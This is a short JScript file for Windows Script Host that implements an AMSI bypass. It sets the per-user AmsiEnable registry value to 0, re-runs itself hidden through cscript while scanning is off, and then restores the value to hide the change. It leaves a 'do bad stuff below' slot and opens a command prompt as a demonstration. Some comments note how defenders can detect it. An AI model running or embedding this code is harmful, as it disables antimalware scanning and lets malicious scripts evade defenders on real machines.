AMSIEnable Bypass in JScript
// WSH (JScript) script: toggles the per-user "AmsiEnable" setting of Windows
// Script Host, re-launches itself under cscript while the setting is 0, then
// restores it. Because the value lives under HKCU, no elevation is involved.
// Defender note: the write to 0 and the write back to 1 happen inside a single
// run, so a point-in-time audit of the key will not observe the change; only
// event-driven registry telemetry on this value (plus the cscript child
// process carrying the -e:{CLSID} engine selector) catches it.
var sh = new ActiveXObject('WScript.Shell');
// Registry value that Windows Script Host consults for AMSI scanning of scripts.
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
// Read the current value. RegRead presumably raises if the value is absent,
// so a missing key also falls through to the catch block below — TODO confirm.
var AmsiEnable = sh.RegRead(key);
if(AmsiEnable!=0){
// Value is set (or non-zero): force the catch path that rewrites it.
throw new Error(1, '');
}
}catch(e){
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI: 0 = AMSI off for this user's WSH scripts
// Re-run this same file through cscript with an explicit engine CLSID
// (the -e: switch). Window style 0 = hidden; third arg 1 = wait for exit.
// Detection: parent wscript/cscript spawning cscript with "-e:{...}" and the
// same ScriptFullName is a distinctive process-tree signature.
sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName,0,1); // blocking call to Run()
sh.RegWrite(key, 1, "REG_DWORD"); // put it back: restore AmsiEnable so steady-state checks see nothing unusual
WScript.Quit(1);
}
// Only the child process (launched while AmsiEnable was 0) reaches this point.
// do bad stuff below
sh.Run("cmd.exe /k echo AMSI bypassed :)")